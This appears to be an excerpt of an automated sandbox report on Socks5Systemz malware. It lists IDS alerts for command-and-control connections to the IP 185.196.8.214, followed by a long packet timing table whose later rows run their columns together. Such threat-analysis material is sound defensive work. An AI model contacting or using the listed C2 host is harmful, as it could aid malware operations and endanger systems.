2024-09-11T21:06:48.660925+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49744 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:49.481618+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49745 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:50.341493+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49746 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:50.706826+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49746 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:51.549357+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49747 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:52.389623+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49748 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:53.198866+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49749 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:53.551402+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49749 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:54.402867+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49750 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:54.765378+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49750 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:55.585127+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49751 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:56.428401+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49752 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:57.264250+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49753 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:58.076172+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49754 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:58.906526+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49755 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:59.848506+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49756 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:00.991707+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49757 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:01.839737+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49758 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:02.669331+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49759 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:03.550461+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49760 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:04.444123+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49761 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:05.339435+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49762 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:06.175896+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49763 | 185.196.8.214 | 80 | TCP
2024-09-11T21:07:07.004269+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49764 | 185.196.8.214 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 11, 2024 21:05:55.892261028 CEST | 49694 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:55.897249937 CEST | 80 | 49694 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:55.897490978 CEST | 49694 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:55.897671938 CEST | 49694 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:55.902595043 CEST | 80 | 49694 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:56.592645884 CEST | 80 | 49694 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:56.592752934 CEST | 49694 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:56.702069044 CEST | 49694 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:56.707371950 CEST | 80 | 49694 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:56.945528984 CEST | 80 | 49694 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:56.945729971 CEST | 49694 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.061623096 CEST | 49694 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.062094927 CEST | 49695 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.067312002 CEST | 80 | 49694 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:57.067435026 CEST | 80 | 49695 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:57.067451000 CEST | 49694 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.067595005 CEST | 49695 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.067815065 CEST | 49695 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.072933912 CEST | 80 | 49695 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:57.758820057 CEST | 80 | 49695 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:57.759018898 CEST | 49695 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.874769926 CEST | 49695 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.875134945 CEST | 49696 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.880140066 CEST | 80 | 49695 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:57.880186081 CEST | 80 | 49696 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:57.880237103 CEST | 49695 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.880286932 CEST | 49696 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.880429029 CEST | 49696 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:57.885328054 CEST | 80 | 49696 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:58.587096930 CEST | 80 | 49696 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:58.587229967 CEST | 49696 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:58.701725006 CEST | 49696 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:58.701984882 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:58.707294941 CEST | 80 | 49696 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:58.707333088 CEST | 80 | 49698 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:58.707374096 CEST | 49696 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:58.707407951 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:58.707561016 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:58.712817907 CEST | 80 | 49698 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:59.436620951 CEST | 80 | 49698 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:59.436702967 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:59.545393944 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:59.550410986 CEST | 80 | 49698 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:59.808842897 CEST | 80 | 49698 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:05:59.808908939 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:59.920454025 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:05:59.925488949 CEST | 80 | 49698 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:00.172555923 CEST | 80 | 49698 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:00.173237085 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:00.295784950 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:00.296066046 CEST | 49699 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:00.301093102 CEST | 80 | 49699 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:00.301256895 CEST | 49699 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:00.301341057 CEST | 49699 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:00.301780939 CEST | 80 | 49698 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:00.301845074 CEST | 49698 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:00.306479931 CEST | 80 | 49699 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:04.025146961 CEST | 80 | 49699 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:04.025367022 CEST | 49699 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:04.139446974 CEST | 49699 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:04.139848948 CEST | 49700 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:04.145023108 CEST | 80 | 49699 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:04.145050049 CEST | 80 | 49700 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:04.145097017 CEST | 49699 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:04.145143986 CEST | 49700 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:04.145266056 CEST | 49700 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:04.150393963 CEST | 80 | 49700 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:04.856555939 CEST | 80 | 49700 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:04.856669903 CEST | 49700 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:04.967935085 CEST | 49700 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:04.972755909 CEST | 80 | 49700 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:05.212599993 CEST | 80 | 49700 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:05.212807894 CEST | 49700 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:05.327626944 CEST | 49700 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:05.328061104 CEST | 49701 | 80 | 192.168.2.5 | 185.196.8.214
Sep 11, 2024 21:06:05.332868099 CEST | 80 | 49700 | 185.196.8.214 | 192.168.2.5
Sep 11, 2024 21:06:05.332940102 CEST | 80 | 49701 | 185.196.8.214 | 192.168.2.5
                                                            Sep 11, 2024 21:06:05.332962990 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.333039045 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.333175898 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.338212013 CEST8049701185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:06.172828913 CEST8049701185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:06.172921896 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.295403004 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.295757055 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.300642014 CEST8049705185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:06.300733089 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.300848007 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.301052094 CEST8049701185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:06.301110983 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.305634975 CEST8049705185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.015593052 CEST8049705185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.015813112 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.139375925 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.139594078 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.145122051 CEST8049706185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.145170927 CEST8049705185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.145343065 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.145343065 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.145529032 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.155440092 CEST8049706185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.862838984 CEST8049706185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.862917900 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.983031034 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.983377934 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.992414951 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.992510080 CEST8049706185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.992608070 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.992744923 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.992779016 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.998164892 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:08.685074091 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:08.685168028 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:08.796487093 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:08.801714897 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.037638903 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.037739992 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.156369925 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.156631947 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.161539078 CEST8049710185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.161611080 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.161645889 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.161700010 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.161799908 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.166553974 CEST8049710185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.851246119 CEST8049710185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.851394892 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.971961975 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.972471952 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.977562904 CEST8049710185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.977607965 CEST8049711185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.977767944 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.977768898 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.978030920 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.983011961 CEST8049711185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.069535017 CEST8049711185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.069617033 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.188045979 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.188544989 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.198738098 CEST8049711185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.198774099 CEST8049712185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.198820114 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.198934078 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.199140072 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.209758997 CEST8049712185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.896188974 CEST8049712185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.896318913 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.022677898 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.023061991 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.029306889 CEST8049712185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.029392004 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.030095100 CEST8049713185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.030174017 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.030303955 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.042583942 CEST8049713185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.773536921 CEST8049713185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.773663044 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.889739990 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.890106916 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.895132065 CEST8049713185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.895210981 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.895466089 CEST8049714185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.895555019 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.895684004 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.901684046 CEST8049714185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:13.605597019 CEST8049714185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:13.605917931 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.751866102 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.752177000 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.757175922 CEST8049715185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:13.757246017 CEST8049714185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:13.757297039 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.757327080 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.757467031 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.762242079 CEST8049715185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:14.458170891 CEST8049715185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:14.458614111 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.576709986 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.577063084 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.583539963 CEST8049715185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:14.583926916 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:14.584012032 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.584041119 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.584191084 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.590053082 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.308001995 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.308093071 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.422348976 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.427268982 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.657740116 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.657815933 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.792859077 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.793287039 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.798336029 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.798439026 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.798504114 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.798561096 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.808743954 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.813657999 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:16.511200905 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:16.511271954 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:16.623903990 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:16.628885031 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:16.890240908 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:16.890326977 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:16.998512030 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.004192114 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:17.260364056 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:17.260659933 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.375322104 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.375688076 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.381087065 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:17.381411076 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.381441116 CEST8049718185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:17.381618023 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.381763935 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.387100935 CEST8049718185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.082767963 CEST8049718185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.082964897 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.207492113 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.208230019 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.212845087 CEST8049718185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.213074923 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.213324070 CEST8049719185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.213505030 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.215065002 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.220073938 CEST8049719185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.905867100 CEST8049719185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.905971050 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.030522108 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.030852079 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.036042929 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:19.036088943 CEST8049719185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:19.036135912 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.036175966 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.036345959 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.041302919 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:19.748555899 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:19.748752117 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.858717918 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.864413023 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.096484900 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.096601009 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.220736027 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.221061945 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.225981951 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.226098061 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.226166010 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.226229906 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.226300955 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.231163979 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.935949087 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.936228991 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.045954943 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.051141024 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:21.296415091 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:21.296598911 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.421264887 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.421597958 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.429747105 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:21.429836988 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.430279016 CEST8049722185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:21.430361986 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.430515051 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.438193083 CEST8049722185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.197506905 CEST8049722185.196.8.214192.168.2.5
